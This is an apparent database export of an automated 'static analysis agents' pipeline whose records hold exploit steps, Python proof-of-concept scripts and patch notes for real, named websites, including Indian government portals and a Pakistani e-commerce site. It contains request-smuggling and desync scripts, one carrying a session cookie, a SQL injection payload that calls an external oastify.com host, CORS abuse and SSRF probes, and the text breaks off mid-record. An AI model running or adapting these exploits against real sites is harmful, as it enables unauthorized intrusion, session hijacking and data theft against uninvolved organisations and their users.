Viewing Collection: web_static_analysis_agents

Simple
Advanced

_id	created_at	url	tool	result	summary
69dcf560f62b3b070a13c40a	Mon Apr 13 2026 13:53:36 GMT+0000 (Coordinated Universal Time)	https://vjti.ac.in	agents	* LARGE PROPERTY * ~1.19 MB Preview:{"exploits":[{"vulnerabil Click to fetch this property
69ddf05184b2eced50f6e9f8	Tue Apr 14 2026 07:44:17 GMT+0000 (Coordinated Universal Time)	https://gujaratindia.gov.in/Index	agents	{ "exploits": [], "exec_passed": 0, "exec_failed": 0 }
69e247a342f66d3d1dbae172	Fri Apr 17 2026 14:45:55 GMT+0000 (Coordinated Universal Time)	https://vjti.ac.in/	agents
69e24ba4f34c3008d2a7e156	Fri Apr 17 2026 15:03:00 GMT+0000 (Coordinated Universal Time)	https://vjti.ac.in/	agents
69e25045dfa00153a3cd9774	Fri Apr 17 2026 15:22:45 GMT+0000 (Coordinated Universal Time)	https://vjti.ac.in/	agents
69e4de3efd67026f7c6f7d4d	Sun Apr 19 2026 13:53:02 GMT+0000 (Coordinated Universal Time)	https://www.altagroup.com.pk/	agents	{ "url": "https://www.altagroup.com.pk/", "timestamp": "2026-04-19T13:53:02.263289+00:00", "results": [ { "vulnerability": "HTTP request smuggling", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint `https://www.altagroup.com.pk/css/animate.min.css` through automated scanning.\n2. Observed that the application uses HTTP/1.1 and supports both `Transfer-Encoding: chunked` and `Content-Length` headers.\n\n## Vulnerability Confirmation\n3. Analyzed the first evidence item showing inconsistent interpretation of HTTP headers (`Transfer-Encoding` with malformed spacing).\n4. Confirmed that the front-end and back-end servers may interpret ambiguous requests differently, indicating potential HTTP Request Smuggling.\n\n## Exploitation Steps\n5. Craft a malicious request that leverages ambiguity between `Transfer-Encoding` and `Content-Length` to smuggle a second request.\n6. Send the crafted payload to the endpoint `https://www.altagroup.com.pk/css/animate.min.css` using chunked encoding with malformed header formatting.\n7. Observe whether the back-end server misinterprets the boundary of the request, allowing for desynchronized processing.\n\n## Impact\n8. Successful exploitation could allow an attacker to bypass front-end security controls, access restricted resources, or perform web cache poisoning.", "exploit_code": "import requests\n\ntarget_url = \"https://www.altagroup.com.pk/css/animate.min.css\"\n\n# Malformed Transfer-Encoding header to cause inconsistency\nmalformed_headers = {\n \"Host\": \"www.altagroup.com.pk\",\n \"User-Agent\": \"Mozilla/5.0\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Transfer-Encoding\": \"chunked\",\n \"Content-Length\": \"25\"\n}\n\n# Body simulating smuggled content\nbody = \"f\\r\\n25txa=x&asuql=x\\r\\n0\\r\\n\\r\\n\"\n\ntry:\n response = requests.post(target_url, headers=malformed_headers, data=body, verify=False)\n print(f\"Status Code: {response.status_code}\")\n print(f\"Response Headers: {response.headers}\")\n print(f\"Response Body Snippet: {response.text[:200]}...\")\nexcept Exception as e:\n print(f\"Error occurred: {e}\")", "patch_code": "## Root Cause\nThe vulnerability arises from inconsistent parsing of HTTP requests by front-end and back-end servers due to ambiguous use of `Transfer-Encoding` and `Content-Length`. The malformed spacing in the `Transfer-Encoding` header contributes to differing interpretations.\n\n## Before/After Fix\nBefore:\nFront-end allows malformed headers such as `Transfer-Encoding\\n : chunked`, leading to inconsistent interpretation.\n\nAfter:\nNormalize all incoming HTTP headers at the front-end proxy or load balancer. Ensure strict adherence to HTTP standards and reject malformed headers.\n\nExample Nginx config:\n```\nhttp {\n # Reject malformed Transfer-Encoding\n if ($http_transfer_encoding ~ \"\\s\") {\n return 400;\n }\n}\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enforce consistent HTTP version usage across infrastructure (preferably HTTP/2 internally).\n- [ ] Disable backend connection reuse where possible.\n- [ ] Implement strict header validation on proxies and WAFs.\n- [ ] Monitor logs for abnormal header patterns or repeated failed requests.\n- [ ] Regularly audit configurations of reverse proxies and backend servers.\n\n## Verification Steps\n1. Re-scan the endpoint using the same tool to confirm rejection of malformed headers.\n2. Manually send a test request with malformed `Transfer-Encoding` and verify 4xx response.\n3. Confirm via packet capture that ambiguous requests are normalized or rejected upstream.", "context": "Severity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/animate.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/bootstrap.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/effect/main.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/fonts.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/main.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/margin.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/css/owl.carousel.min.css\n\n---\n\nSeverity: Medium (Tentative)\nURL: https://www.altagroup.com.pk/fancybox/jquery.fancybox.css" } ], "_id": "69e4dc506634e3f9dd7fe59e" }
69e5d7addf306ba4f03e141c	Mon Apr 20 2026 07:37:17 GMT+0000 (Coordinated Universal Time)	https://www.jamals.com/	agents
69e5e222c0a1c08bf1bde807	Mon Apr 20 2026 08:21:54 GMT+0000 (Coordinated Universal Time)	https://www.jamals.com/	agents
69e7c8a214ecfdc38d16a6fb	Tue Apr 21 2026 18:57:38 GMT+0000 (Coordinated Universal Time)	https://mahatenders.gov.in/	agents	{ "url": "https://mahatenders.gov.in/", "timestamp": "2026-04-21T18:57:38.344743+00:00", "results": [ { "vulnerability": "Client-side desync", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint: `https://mahatenders.gov.in/nicgep/app`\n2. Observed that the server uses `Content-Length` header for determining request boundaries.\n3. Noted that the server supports persistent connections (`Connection: keep-alive`).\n\n## Vulnerability Confirmation\n1. Sent a crafted POST request with a `Content-Length` larger than the actual body.\n2. Embedded a second HTTP request (`GET /robots.txt`) within the body of the first POST request.\n3. Observed that the server responded to the first request without closing the connection.\n4. Confirmed that the embedded request was interpreted as the next incoming request.\n\n## Exploitation Steps\n1. Craft a malicious POST request targeting `/nicgep/app` with an oversized `Content-Length`.\n2. Embed a secondary HTTP request in the body that performs an action on behalf of the victim (e.g., trigger XSS).\n3. Deliver the payload via a page that causes the victim's browser to send the request.\n4. Observe desynchronization where the smuggled request executes unexpectedly.\n\n## Impact\nSuccessful exploitation leads to client-side desync, potentially enabling cross-site scripting (XSS), session hijacking, or unauthorized actions performed on behalf of authenticated users.", "exploit_code": "import requests\n\n# Target URL\nurl = \"https://mahatenders.gov.in/nicgep/app\"\n\n# Malicious payload simulating CSD attack\nmalicious_body = (\n \"GET /robots.txt HTTP/1.1\\r\\n\"\n \"Host: mahatenders.gov.in\\r\\n\"\n \"\\r\\n\"\n)\n\n# Headers with oversized Content-Length\nheaders = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Content-Length\": str(len(malicious_body) + 50), # Oversized length\n \"Connection\": \"keep-alive\",\n \"Cookie\": \"JSESSIONID=662459EDEB875FE684A09EE28B48E051.mhgeps2; AreCookiesEnabled=829\"\n}\n\n# Send initial smuggle attempt\nresponse = requests.post(url, headers=headers, data=malicious_body, verify=False)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Body Snippet: {response.text[:200]}...\")", "patch_code": "## Root Cause\nThe server incorrectly handles `Content-Length` in POST requests, allowing attackers to embed additional HTTP requests in the message body. This results in connection desynchronization and potential smuggling of unintended requests.\n\n## Before/After Fix\nBefore: Server accepts and partially processes oversized POST bodies without enforcing strict parsing or connection closure.\n\nAfter: Enforce strict HTTP message parsing:\n- Validate `Content-Length` matches actual body size.\n- Close connections after each malformed POST request.\n- Alternatively, upgrade to HTTP/2 which mitigates such issues inherently.\n\nExample mitigation logic (pseudo-code):\n```\nif request.method == 'POST' and len(request.body) != content_length_header:\n close_connection()\n return error_response(400)\n```\n\n## Defense-in-Depth Checklist\n- [ ] Enable strict HTTP parsing at reverse proxy/WAF layer.\n- [ ] Disable HTTP/1.x keep-alive if not required.\n- [ ] Upgrade backend protocol to HTTP/2.\n- [ ] Implement input validation for all headers including `Content-Length`.\n- [ ] Monitor logs for abnormal request patterns or mismatched sizes.\n\n## Verification Steps\n1. Re-run the PoC script against the patched endpoint.\n2. Confirm that the connection is closed immediately upon detecting oversized content.\n3. Ensure subsequent legitimate requests are handled normally.\n4. Validate that no part of the smuggled request appears in responses.", "context": "Severity: High (Tentative)" } ], "_id": "69e7c8a259a6632dae07de0b" }
69e8bebe267490bee0f9379b	Wed Apr 22 2026 12:27:42 GMT+0000 (Coordinated Universal Time)	https://www.daraz.pk/	agents	{ "url": "https://www.daraz.pk/", "timestamp": "2026-04-22T12:27:42.473068+00:00", "results": [ { "vulnerability": "SQL injection", "category": "injection", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint as `https://www.daraz.pk/` accepting arbitrary URL parameters.\n2. Noted from scan data that the parameter name itself (not value) is vulnerable to SQL injection.\n3. Confirmed backend database is likely MySQL based on successful `load_file` interaction with external domain.\n\n## Vulnerability Confirmation\n1. Submitted payload in the name of a dynamically generated URL parameter: `'+(select load_file('\\\\87duz4kwffvgtwpx2xwueev7uy0soic9fx9kz8o.oastify.com\\wgy'))+'`\n2. Observed DNS interaction with `oastify.com`, confirming execution of injected SQL query.\n\n## Exploitation Steps\n1. Craft a malicious parameter name containing a SQL injection payload targeting MySQL.\n2. Submit request to `https://www.daraz.pk/` with the malicious parameter name.\n3. Observe backend query execution through out-of-band interaction or error-based responses.\n4. Extract data or escalate privileges by chaining additional SQL commands.\n\n## Impact\nSuccessful exploitation allows:\n- Unauthorized reading/modification of database contents.\n- Potential full compromise of the database server.\n- Bypassing authentication or manipulating business logic.", "exploit_code": "import requests\n\n# Target endpoint identified during scan\nurl = \"https://www.daraz.pk/\"\n\n# Malicious parameter name exploiting SQLi via MySQL load_file OAST payload\nmalicious_param_name = \"'+(select load_file('\\\\87duz4kwffvgtwpx2xwueev7uy0soic9fx9kz8o.oastify.com\\wgy'))+'\"\n\n# Inject the payload as the name of a dynamic URL parameter\nparams = {malicious_param_name: \"test_value\"}\n\ntry:\n response = requests.get(url, params=params, timeout=10)\n print(f\"Status Code: {response.status_code}\")\n print(\"Check oastify.com logs for DNS interaction to confirm SQLi success.\")\nexcept Exception as e:\n print(f\"Request failed: {e}\")", "patch_code": "## Root Cause\nUser-supplied input (specifically, the names of URL parameters) is directly concatenated into SQL queries without sanitization or parameterization. This allows attackers to alter the query structure and execute arbitrary SQL commands.\n\n## Before / After Fix\n### Before (Vulnerable Code Example):\n```python\nquery = f\"SELECT * FROM items WHERE category = '{param_name}'\"\ncursor.execute(query)\n```\n\n### After (Secure Implementation):\nUse parameterized queries to safely handle dynamic inputs:\n```python\nquery = \"SELECT * FROM items WHERE category = %s\"\ncursor.execute(query, (param_value,))\n```\nEnsure all parts of the query—including column names—are validated against a whitelist if they are derived from user input.\n\n## Defense-in-Depth Checklist\n- [ ] Enforce strict input validation and sanitization on all user-controlled fields.\n- [ ] Use ORM frameworks that abstract raw SQL usage.\n- [ ] Apply least privilege principle to database accounts used by the application.\n- [ ] Implement WAF rules to detect common SQL injection patterns.\n- [ ] Regularly audit code for unsafe query construction practices.\n\n## Verification Steps\n1. Resend original payload (`'+(select load_file(...)` in param name) and verify no DNS interaction occurs.\n2. Confirm application returns generic error or ignores malformed parameters gracefully.\n3. Perform authenticated re-scan using same tooling to ensure vulnerability does not reappear.", "context": "Severity: High (Certain)\nURL: https://www.daraz.pk/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/_____tmd_____/punish [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/_____tmd_____/punish [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/_____tmd_____/punish [URL path folder 8]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]" }, { "vulnerability": "Cross-origin resource sharing: arbitrary origin trusted", "category": "rce", "exploit_steps": "## Reconnaissance\n1. Identified the target endpoint `https://www.daraz.pk/` during scanning.\n2. Observed that the application implements a CORS policy which reflects back the `Origin` header without validation.\n\n## Vulnerability Confirmation\n3. Sent a request with a custom `Origin` header (`https://pniszcjphywu.com`) to confirm trust of arbitrary origins.\n4. Verified that the server responded with `Access-Control-Allow-Origin: https://pniszcjphywu.com` and `Access-Control-Allow-Credentials: true`, indicating full CORS misconfiguration.\n5. Confirmed absence of `Vary: Origin` header, enabling potential cache poisoning.\n\n## Exploitation Steps\n6. Crafted a malicious webpage hosted at `https://pniszcjphywu.com` to exploit the CORS misconfiguration.\n7. Used JavaScript to make authenticated requests to `https://www.daraz.pk/` leveraging user credentials via cookies.\n8. Retrieved sensitive user data such as account details or session-specific content due to the presence of `Access-Control-Allow-Credentials: true`.\n9. Demonstrated ability to perform unauthorized actions on behalf of logged-in users.\n\n## Impact\n10. Successful exploitation leads to unauthorized access to sensitive user data and possible execution of privileged operations under the victim's context, resulting in account compromise.", "exploit_code": "import requests\n\ntarget_url = \"https://www.daraz.pk/\"\nmalicious_origin = \"https://pniszcjphywu.com\"\n\nheaders = {\n \"Origin\": malicious_origin,\n \"User-Agent\": \"Mozilla/5.0\"\n}\n\nresponse = requests.get(target_url, headers=headers)\n\nprint(\"Status Code:\", response.status_code)\nprint(\"Access-Control-Allow-Origin:\", response.headers.get(\"Access-Control-Allow-Origin\"))\nprint(\"Access-Control-Allow-Credentials:\", response.headers.get(\"Access-Control-Allow-Credentials\"))\nprint(\"Vary Header Present?:\", \"Vary\" in response.headers)", "patch_code": "## Root Cause\nThe application trusts any origin provided in the `Origin` header by reflecting it back in the `Access-Control-Allow-Origin` header. Additionally, `Access-Control-Allow-Credentials: true` is set, allowing credential-based access from any domain. Absence of the `Vary: Origin` header increases risk of caching responses for unintended recipients.\n\n## Before / After Fix\nBefore:\n```http\nAccess-Control-Allow-Origin: https://pniszcjphywu.com\nAccess-Control-Allow-Credentials: true\n```\n\nAfter:\nImplement a strict whitelist of trusted domains and ensure proper handling of the `Vary` header:\n```http\nAccess-Control-Allow-Origin: https://www.daraz.pk\nVary: Origin\n```\n\nIn application logic (example pseudo-code):\n```python\nALLOWED_ORIGINS = ['https://www.daraz.pk', 'https://secure.daraz.pk']\nif request.headers.get('Origin') in ALLOWED_ORIGINS:\n response.headers['Access-Control-Allow-Origin'] = request.headers['Origin']\n response.headers['Vary'] = 'Origin'\n```\n\n## Defense-in-Depth Checklist\n- [ ] Maintain an explicit allowlist of permitted origins.\n- [ ] Never reflect the `Origin` header value blindly.\n- [ ] Avoid setting `Access-Control-Allow-Credentials: true` unless strictly necessary.\n- [ ] Always include `Vary: Origin` when dynamic CORS headers are used.\n- [ ] Regularly audit CORS policies across all endpoints.\n- [ ] Use automated tools to detect insecure CORS configurations during CI/CD pipelines.\n\n## Verification Steps\n1. Send a GET request with a random `Origin` header to the affected endpoint.\n2. Confirm that the reflected `Access-Control-Allow-Origin` matches only known good domains.\n3. Ensure `Access-Control-Allow-Credentials` is not exposed unless required.\n4. Validate presence of `Vary: Origin` in the HTTP response headers.", "context": "Severity: High (Certain)\nURL: https://www.daraz.pk/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/12-12-sale-2020/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/12-12-sale-2020/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/_____tmd_____/punish\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/_____tmd_____/punish" }, { "vulnerability": "External service interaction (HTTP)", "category": "miscellaneous", "exploit_steps": "## Reconnaissance\n1. Identified that the `Referer` HTTP header on `https://www.daraz.pk/cart/` is reflected in server-side HTTP requests.\n2. Confirmed that arbitrary external domains can be targeted via this header.\n\n## Vulnerability Confirmation\n1. Submitted a payload containing a Burp Collaborator URL (`http://xpqjht2lx4d5bl7mkmejw3dwcnih6du3iy5pte.oastify.com/`) in the `Referer` header.\n2. Observed an HTTP request made by the server to the Collaborator domain, confirming SSRF capability.\n\n## Exploitation Steps\n1. Craft a malicious HTTP request targeting internal services or public endpoints via the `Referer` header.\n2. Submit the request to `https://www.daraz.pk/cart/` with the malicious `Referer` header.\n3. Observe server-side interaction with the specified endpoint.\n4. Use this behavior to probe internal infrastructure or access localhost-only services if applicable.\n\n## Impact\nAn attacker can leverage this SSRF to:\n- Scan internal networks inaccessible externally.\n- Interact with internal services such as metadata endpoints (e.g., cloud instance metadata).\n- Bypass firewall rules by using the server as a proxy.", "exploit_code": "import requests\n\ntarget_url = \"https://www.daraz.pk/cart/\"\ncollaborator_url = \"http://xpqjht2lx4d5bl7mkmejw3dwcnih6du3iy5pte.oastify.com/\"\n\nheaders = {\n \"Referer\": collaborator_url,\n \"User-Agent\": \"Mozilla/5.0\"\n}\n\nresponse = requests.get(target_url, headers=headers)\nprint(f\"Status Code: {response.status_code}\")\nprint(f\"Response Headers: {response.headers}\")", "patch_code": "## Root Cause\nThe application processes the `Referer` HTTP header without validation and makes server-side HTTP requests to user-supplied URLs. This allows attackers to induce outbound requests to arbitrary domains.\n\n## Before/After Code Fix\nBefore:\n```python\nreferer = request.headers.get('Referer')\nrequests.get(referer)\n```\n\nAfter:\n```python\nallowed_hosts = {'trusted-domain.com', 'another-trusted.com'}\nreferer = request.headers.get('Referer')\n\nif referer:\n parsed_url = urlparse(referer)\n if parsed_url.hostname in allowed_hosts:\n requests.get(referer)\n else:\n raise ValueError(\"Host not allowed\")\n```\n\n## Defense-in-Depth Checklist\n- [ ] Implement a strict allowlist of trusted domains for outbound requests.\n- [ ] Block access from the application server to internal IP ranges (e.g., 127.0.0.1, 10.x.x.x, 192.168.x.x).\n- [ ] Sanitize and validate all user-controllable input influencing network requests.\n- [ ] Log and monitor outbound requests originating from the application server.\n- [ ] Disable unnecessary protocols (e.g., file://, gopher://) in HTTP client libraries.\n\n## Verification Steps\n1. Resend the original request with a `Referer` pointing to a Collaborator URL.\n2. Confirm that no outbound request is made to the external domain.\n3. Verify that requests to allowlisted domains still function as expected.", "context": "Severity: High (Certain)\nURL: https://www.daraz.pk/cart/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High 